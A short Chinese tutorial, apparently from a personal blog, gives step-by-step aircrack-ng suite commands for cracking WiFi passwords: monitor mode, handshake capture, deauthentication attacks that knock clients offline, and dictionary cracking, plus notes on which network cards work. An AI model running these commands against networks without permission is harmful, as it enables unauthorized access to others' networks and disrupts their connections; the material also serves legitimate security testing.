WiFi安全

渗透测试,从入门到入狱

查看网卡信息

1
airmon-ng

网卡开启监听模式

1
airmon-ng start {网卡名称}

例如可用的无线网卡名称为wlan0

查看监听模式是否开启成功

1
iwconfig

网卡名称变成 wlan0mon 说明已经开启成功。

扫描附近热点信息

1
airodump-ng {处于监听模式的网卡名称}

抓取握手包

命令格式

1
airodump-ng -c {无线网络信道} --bssid {目标无线 AP 的硬件地址} -w {扫描结果保存的文件名} {处于监听模式的网卡名称}

扫描过程中如果有用户设备尝试连接 Wi-Fi 时,我们就会拿到握手包。当抓到握手包时,上述命令输出的第一行会显示“handshake”字样。

使用 aireplay-ng 对目标设备发起攻击

可以看到使用上述命令抓不到握手包,原因是没有客户端与 AP 进行认证连接。但是对于已有客户端连接的热点,可以发送反认证包,让客户端下线,该客户端将重新尝试连接热点,这时候就可以抓到握手包了。

发送反认证包的命令格式为

1
aireplay-ng -0 {发送反认证包的个数} -a {无线 AP 硬件地址} -c {强制下线的MAC地址} {处于监听模式的网卡名称}

使用 aircrack-ng 进行破解

命令格式

1
aircrack-ng -w {本地字典文件} {握手包}

无线网卡退出监听模式

命令格式

1
airmon-ng stop {处于监听模式的无限网卡名称}

注意事项

字典文件是破解的关键,网上有很多字典。
并不是所有网卡都支持监听模式,例如 DW1510,虽然执行开启监听模式命令成功,查看网卡模式也有enable字样,但是网卡名称不会加mon,实测看不到连接到热点的客户端,更抓不到握手包。而 BCM4360 更是缺少了 Linux 下的驱动,直接废物。实测 Atheros AR928X 是可以开启监听模式并抓到握手包的。

参考

kali 破解 wifi 密码
wpa-dictionary